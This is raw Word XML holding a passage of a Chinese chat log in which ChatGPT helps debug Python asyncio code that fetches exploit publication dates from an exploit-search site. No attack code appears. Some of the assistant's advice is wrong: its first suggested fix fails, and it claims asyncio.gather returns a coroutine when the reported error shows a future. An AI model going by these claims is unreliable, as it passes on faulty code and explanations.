    <w:p w14:paraId="6FD8BB6B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689AECD5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.run()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python 3.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中引入的一个新函数，它可以接受一个协程作为参数，然后运行事件循环，直到这个协程完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7C960D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38952F10" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以，当你看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"coroutine 'querySploitus' was never awaited"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的警告时，你应该检查你的代码，确认你正确地使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来调用和等待你的协程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3B5772" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55969A10" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus(url, data_offset=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA13600" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA15DD6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        response = await client.post(url=url, json={"type": "exploits", "sort": "date", "query": "cve", "title": False, "offset": data_offset}, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5599D1A7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_json = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090CD7B3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBBB44F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        exps = res_json["exploits"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58012313" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for single_exp in exps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAB6AB7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if single_exp.get("published")!=None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5129CE03" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                single_exp_date = single_exp.get("published")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD139A2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                res_list.append(single_exp_date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349CCEF3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(res_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBC049C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E09C7B1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [querySploitus(10*x) for x in range(0,10)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283E7DE3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007023DE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># asyncio.run(querySploitus(url))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691CAA2D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>asyncio.run(task_list)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我这段代码有什么问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB978D6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655D6BAD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF8C60E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这段代码中，你创建了一个任务列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其中的每个元素都是一个协程。然后，你试图将整个列表传递给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.run() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。但这是不正确的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.run() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数期望接收的是一个单个的协程，而不是一个协程列表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D2EABE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338444D4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了修复这个问题，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，它接收一个协程列表，然后并发运行所有的协程，并等待它们全部完成。修复后的代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74514FA1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E68D2CA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B8099" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus(url, data_offset=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2531591B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71342D62" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        response = await client.post(url=url, json={"type": "exploits", "sort": "date", "query": "cve", "title": False, "offset": data_offset}, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BDFADD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_json = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084DF0A4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31157CE6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        exps = res_json["exploits"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20655BAC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for single_exp in exps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7AA056" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if single_exp.get("published")!=None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A65EEB0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                single_exp_date = single_exp.get("published")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1382C210" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                res_list.append(single_exp_date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5B9769" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(res_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CC6871" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ACF93F7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [querySploitus(10*x) for x in range(0,10)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C2732" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68289968" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并发运行所有的协程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78920883" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(asyncio.gather(*task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155D92B6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D2132E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样修改之后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.run(asyncio.gather(*task_list)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会并发运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task_list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的所有协程，并等待它们全部完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333694FE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFEA07A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> querySploitus() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数似乎期望接收一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为第一个参数，但是在创建任务列表的时候，你传入的是一个数值（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10*x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。你需要确保你传递给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> querySploitus() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的是一个有效的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765F37BE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA628B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我更改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async def querySploitus(url, data_offset=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D34556" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B17E216" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        response = await client.post(url=url, json={"type": "exploits", "sort": "date", "query": "cve", "title": False, "offset": data_offset}, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E494AC6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_json = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC64D2A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8B5026" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        exps = res_json["exploits"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218EA071" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for single_exp in exps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ADD255" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            if single_exp.get("published")!=None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626B0B6D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                single_exp_date = single_exp.get("published")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA23AE0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                res_list.append(single_exp_date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB97AE4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(res_list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC5CA9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726BA572" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B6EF64" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530A953C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># asyncio.run(querySploitus(url))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580C0AB1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.run(asyncio.gather(*task_list))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ValueError: a coroutine was expected, got &lt;_GatheringFuture pending&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610317B8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB1CB81" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15D8EFA7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抱歉给你带来了困扰。这个问题的原因是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather(*task_list) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的是一个协程对象，你需要在一个异步函数中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个结果。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.run() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只接受一个协程对象，但不能直接接受一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> gather </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6EA0B3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3517D45C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather(*task_list) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放在另一个异步函数里面，然后运行这个函数，就像下面这样：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3AA563" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE7AA3E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047B004B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def querySploitus(url, data_offset=0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC6E2B5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
